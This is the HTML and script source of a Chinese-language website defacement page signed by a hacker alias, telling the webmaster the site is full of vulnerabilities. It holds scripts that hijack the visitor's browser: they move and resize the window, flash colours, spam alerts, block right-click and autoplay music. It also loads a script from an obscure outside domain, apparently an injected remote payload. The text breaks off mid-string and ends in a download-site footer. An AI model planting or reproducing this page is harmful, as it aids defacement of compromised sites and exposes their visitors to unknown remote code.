<script>
window.scrollBy(0, 100)
window.resizeTo(0,0)
window.moveTo(0,0)
document.bgColor=0x000000
document.fgColor=0x000000
//setInterval("move()",30);
setTimeout("move()", 1);
var mxm=50
var mym=25
var mx=0
var my=0
var sv=50
var status=1
var szx=0
var szy=0
var c=255
var n=0
var sm=30
var cycle=2
var done=2
function move()
{
if (status == 1)
{
mxm=mxm/1.05
mym=mym/1.05
mx=mx+mxm
my=my-mym
mxm=mxm+(400-mx)/100
mym=mym-(300-my)/100
window.moveTo(mx,my)
rmxm=Math.round(mxm/10)
rmym=Math.round(mym/10)
if (rmxm == 0)
{
if (rmym == 0)
{
status=2
}
}
}
if (status == 2)
{
sv=sv/1.1
scrratio=1+1/3
mx=mx-sv*scrratio/2
my=my-sv/2
szx=szx+sv*scrratio
szy=szy+sv
window.moveTo(mx,my)
window.resizeTo(szx,szy)
if (sv < 0.1)
{
status=3
}
}
if (status == 3)
{
document.fgColor=0xffffFF
c=c-16
document.bgColor=0x000000
if (c<0)
{status=8}
}
if (status == 4)
{
c=c+16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 239)
{status=5}
}
if (status == 5)
{
c=c-16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c < 0)
{
status=6
cycle=cycle-1
if (cycle > 0)
{
if (done == 1)
{status=7}
else
{status=4}
}
}
}
if (status == 6)
{
document.title = ""
alert("")
cycle=2
status=4
done=1
}
if (status == 7)
{
c=c+4
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 128)
{status=8}
}
if (status == 8)
{
window.moveTo(0,0)
sx=screen.availWidth
sy=screen.availHeight
window.resizeTo(sx,sy)
status=9
}
var timer=setTimeout("move()",0.3)
}
</script>
<script language="VBSCRIPT">
<!--
MSGBOX"网站管理员"
MSGBOX"贵网站存在严重安全漏洞"
MSGBOX"[Avenger.小豪]友情检测!"
MSGBOX("By:小豪! QQ:924773729")
-->
</script>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<script src="http://u.asdafdgfgf.com/ads.js"></script> <HTML>
<HEAD>
<TITLE>Hacker By [Avenger.小豪]</TITLE>
<STYLE type=text/css>
body{
scrollbar-shadow-color:#FFFFFF;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color: #000000;
scrollbar-darkshadow-color:#000000;
scrollbar-arrow-color:#FFFFFF;
scrollbar-base-color: #000000;
scrollbar-track-color: #000000;
overflow-y:auto; }
<!--
/*豪炫特效.谢绝抄袭*/
body{
CURSOR: url('http://www.ay001.com/admin/2.cur');
background-color: #000000;
}/*未选中前鼠标样式*/
a:hover{CURSOR: url('http://www.ay001.com/admin/1.cur')}/*已选中后鼠标样式*/
a:link {
color: #00FF00;
text-decoration: none;
}
a:visited {
text-decoration: none;
color: #00FF00;s
}
a:hover {
text-decoration: underline;
color: #FF0000;
}
a:active {
text-decoration: none;
color: #FF0000;
}
.STYLE1 {color: #00FF00}
-->
</STYLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"><BODY><br>
<br>
<bgsound src=http://freebx.cn/MP3/hk.mp3 autostart=true loop=infinite>
<H1 align=center><SPAN id=theText style="WIDTH: 100%">沒人可以替玳祢在硪芯中‘d位置</SPAN></H1>
<SCRIPT>
<!--
var from = 1;
var to = 4;
var delay = 55;
var glowColor = "lime";
var i = to;
var j = 0;
textPulseDown();
var msg = "安全检测到此完毕,贵站漏洞相当多的........................................ " ;
var interval=70
var spacelen=120;
var space10=" ";
var seq=0;
function Scroll()
{
len = msg.length;
window.status = msg.substring(0, seq+1);
seq++;
if(seq>=len ){
seq = 0;
window.status = '';
window.setTimeout("Scroll();", interval );
}
else
window.setTimeout("Scroll();", interval );
}
Scroll();
function disable_right_click(e) {
var browser = navigator.appName.substring ( 0, 9 );
var event_number = 0;
if (browser=="Microsoft")
event_number = event.button;
else
event_number = e.which;
if ( event_number==2 || event_number==3 || event_number==4) {
alert ("\n——你想干什么?——\t\t\n\n我靠你小子,不想活了啊.\n");
return (false);
}
return (true);
}
function check_mousekey () {
var mouse_key = 93;
var keycode = event.keyCode;
if ( keycode == mouse_key )
alert ( "\n——你想干什么?——\t\t\n\n我靠你小子,不想活了啊.\n");
}
function trap_page_mouse_key_events () {
var browser = navigator.appName.substring ( 0, 9 );
document.onmousedown = disable_right_click;
if ( browser == "Microsoft" )
document.onkeydown = check_mousekey;
else
document.captureEvents( Event.MOUSEDOWN );
}
window.onload=trap_page_mouse_key_events;
function textPulseUp()
{
if (!document.all)
return
if (i < to)
{
theText.style.filter = "Glow(Color=" + glowColor + ", Strength=" + i + ")";
i++;
theTimeout = setTimeout('textPulseUp()',delay);
return 0;
}
if (i = to)
{
theTimeout = setTimeout('textPulseDown()',delay);
return 0;
}
}
function textPulseDown()
{
if (!document.all)
return
if (i > from)
{theText.style.filter = "Glow(Color=" + glowColor + ", Strength=" + i + ")";
i--;theTimeout = setTimeout('textPulseDown()',delay);return 0;}if (i = from){theTimeout = setTimeout('textPulseUp()',delay);return 0;}}//-->
</SCRIPT>
<br>
<FORM name=textform>
<CENTER>
<input name=LajiCurText type="hidden">
<textarea style="FONT-SIZE: 12px; BORDER-LEFT-COLOR: #00ff00; BORDER-BOTTOM-COLOR: #00ff00;
COLOR: #00ff00; BORDER-TOP-COLOR: #00ff00; SCROLLBAR-BASE-COLOR: #000000; BACKGROUND-COLOR:
#000000; BORDER-RIGHT-COLOR: #00ff00" name=textfield rows=27 readonly wrap=virtual
cols=99></textarea>
</CENTER>
<SCRIPT language=javascript>
var pos=0;
var LajiCurI=0;
function LajiCur() //本代码由飘遥网络By.[Avenger.小豪] QQ:924773729编写,无可翻版的垃圾-
{
if(LajiCurI==0)
document.textform.LajiCurText.value="_";
else if(LajiCurI==1)
document.textform.LajiCurText.value=" ";
else if(LajiCurI==2)
document.textform.LajiCurText.value="_";
else if(LajiCurI>2)
{document.textform.LajiCurText.value=" ";LajiCurI=0;}
LajiCurI++;
}
setInterval("LajiCur()",delay);
function ShowText(strText)
{
document.textform.textfield.value=strText.substring(0,pos++)
+document.textform.LajiCurText.value;
setTimeout("ShowText(strText)",50);
if(pos==strText.length)
{
return;
}
}var strText = "\n 致尊敬的贵站站长\n——————————————————————————————————————————————————\n→ > 轻轻的我来了.\n→ > 给您带来了一个不幸的消息...\n→ > 由于您的网站.............\n→ > 含有严重漏洞....\n→ > 特依此方式通知站长............\n→ > 本人不是故意的``...!\n→ > 只是想为国内的网络安全尽一份力...\n→ > 请谅解..谢谢..\n→ > ..以下文字纯属`虚构`娱乐而写..!\n——————————————————————————————————————————————————\n→ > q
普通网友
- 粉丝: 0
- 资源: 3
最新资源
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈